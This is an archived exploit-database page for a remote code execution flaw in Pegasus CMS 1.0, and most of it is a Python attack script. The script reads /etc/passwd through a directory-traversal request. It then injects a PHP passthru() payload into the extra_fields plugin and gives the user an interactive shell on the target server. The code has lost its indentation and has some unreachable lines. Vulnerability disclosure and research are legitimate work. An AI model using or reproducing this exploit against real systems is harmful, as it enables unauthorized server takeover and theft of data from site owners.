what you don't know can hurt you

Pegasus CMS 1.0 Remote Code Execution

Pegasus CMS 1.0 Remote Code Execution
Posted Mar 14, 2019
Authored by R3zk0n

Pegasus CMS version 1.0 suffers from a code execution vulnerability in extra_fields.php.

tags | exploit, php, code execution
MD5 | 07ac9145027e1934aaa3e9418e07c540

Pegasus CMS 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution
# Date: 14 March 2019
# Exploit Author: R3zk0n
# Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms
# Software Link: N/A
# Version: 1.0
# Tested on: Linux
# CVE : N/A

The Pegasus CMS is vulnerable to directory travaseral and Remote code execution due to the way the extra_fields.php plugin functions.

The Plugin can be exploited using the safer eval trick linked below http://justanotherhacker.com/2016/04/analysis_of_the_safer_eval_rce_aka__the_wahckon_bug.html to obtain remote code execution

Exploit attached below:

#Eval is secure.. not really.
# These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al
requests.packages.urllib3.disable_warnings()
banner = '''
Welcome to the DANGER ZONE.
;;J,ss,g,;
,s#@##"""77"^""77""@@Mw,
,#@#C7: ,, *^*@@@w
;@#7. ;#@#. ]ssmMMm#@@@m,
,##\` ,< ,@@@@Q ,,#@#*7` ;s@@@@@@@@@Q
;@#` ]@C ;@@@@@@@@@@"\ ;@@@@@@@@@@@@@@@m
@#\ #@@w#@@@@@@@@@@#~ @@@#M5"7j5#@@@@@@@@Q
;@C @@@@@@@@@@@@@@#\ @#\, *77@@@k
##. #@@@@@@@@@@@@@# '* {@@@
@#` a@@@@@@@@@@@@@@L *%@@
{@* ]@@@@@@@@@@@@@@#C* "@@
.@b;,s#@@@@@@@#@@#@@@@@@#C* ;s#@@@@@@m, j@b
@@@#@@@@@@@@@@@@@@@@@@#C =* ,ppJJs#@@@@@@@@@@@@@k @@
@#1@@@@@@@@@@@@@@@@#W~ ;@QQ@@@@@@@@@#` `|7@@@@~ ]@p
@[ @@5"@@@@@@@@@@#~ s@@@@@####@@@@@#\ @@@b ]@b
@[ @ j@@@@@@@@~]#"7 "@@#"\ 7@@C @@@b ]@b
@@ @@@@@@@@@@c ^@@ ]@ ,@@@# @@b
@@~ @ @@@@@@@@@@@b @# a@@@@" ]@@
j@Q @@@@@@@@@@@@@@@@o ,J ]\ s@@@@#"` ]@@L
]@b ]@@@@@@@@@@@@@@@@o ,@@@@> ;@@@@@#^ #@@#
@@Q """%*577"%@@@@@@# ]@@@@@C ;@@@@#C ;@@@#*
%@m @@@@@@@ .@@@@@# {@@@@@> s@@@@#*
7@@ @@M@@@@@k ^@@@"# @@@@@@@@@@@@@@@#
*@@m @@bj@@@b@@@o|"^]# %@@@@@@#M7@@#^
7@@m "# @@# @@7@@@@@@~ ^||:`,#@#C
^%@@m j @b j# \@@@@@@ ,#@@#
`7@@@mJ 7 ' |%@@@@@m, -g,ss#@@@@#C
`7%@@@Mm, `7"%####@@MMMM#@@@#M7.
^7@@@@@@@@@@@@@@@@@@@@#MT^:
`~^"7""""7^\*:
Chimeria Exploit.
pegausCMS Exploit's.
'''


print banner


raw_url = raw_input("Please enter a domain name: \n")


def dir_Trav(raw_url):
print "Checking for directory travseral..\n"
dir_list = requests.get("https://www."+ raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close", "Cache-Control": "max-age=0"})
print dir_list.content
return
print "Trying to execute directory travseral"
dir_Trav(raw_url)
r = requests.get("http://" + raw_url)
print "Checking Status code: %s" % r.status_code
if r.status_code == 200:
print "Connected"
print "Checking is using vulnerable CMS."
vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php"
b = requests.get("http://" + raw_url + "/file/includes/plugins/globalFields/submit.php")
print "Checking CMS Status: %s " % b.status_code
if b.status_code == 200:
print "Seems exploitable.. Lets try to list the files!"



print raw_url
list_files = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"ls -lah\");exit;phpinfo"})
print list_files.content
status = list_files.status_code
while status == 200:
try:
ShellCheck = raw_input("Shell>").strip()

Shell = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"{}\");exit;phpinfo".format(ShellCheck)})

print Shell.content
if ShellCheck == "exit":
sys.exit(0)
except KeyboardInterrupt:
print "Your exited bye"
sys.exit(0)

else:
print "Connected but does not seem exploitable. \n"
print "Bye!!!!!!!!!! \n"




else:
print "Not connected"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    1 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close